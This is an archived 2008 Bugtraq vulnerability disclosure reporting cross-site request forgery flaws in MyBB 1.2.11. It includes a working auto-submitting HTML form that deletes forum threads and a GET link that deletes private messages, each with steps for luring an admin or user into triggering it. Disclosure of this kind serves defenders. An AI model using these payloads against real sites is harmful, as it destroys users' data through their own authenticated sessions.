Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: MyBB 1.2.11 Multiple XSRF Vulnerabilities

MyBB 1.2.11 Multiple XSRF Vulnerabilities

From: <nbbn_at_gmx.net>
Date: Fri, 18 Jan 2008 21:50:23 +0100

####################################################
Founded: 18, January 2008
Founder: nbbn
MyBB Version: 1.2.11 and lower
Type: Multiple XSRF Vulnerabilities
####################################################

####1) Delete Threads XSRF Vulnerabilitie:

<html>
<head>
</head>
<body onLoad="javascript:document.formular.submit()">
<form action="http://localhost/xampp/mybb/moderation.php" method="post"
name="formular">
<input type="hidden" name="action" value="do_multideletethreads" />
<input type="hidden" name="fid" value="2" /> <!-- forumid -->
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->
<input type="submit" value="Delete Threads" />
</form>

</body>
</html>

###Poc:
        1. Create a .html file and copy the code into it.
        2. Upload the file and now send the link to an admin or moderator
        3. Done

####2) Delete PM's XSRF Vuln:

 This one is only doing via GET and no question:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3

###Poc: (An easy way):

 1. Send to a user this link:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
 2. Done
Received on Jan 18 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]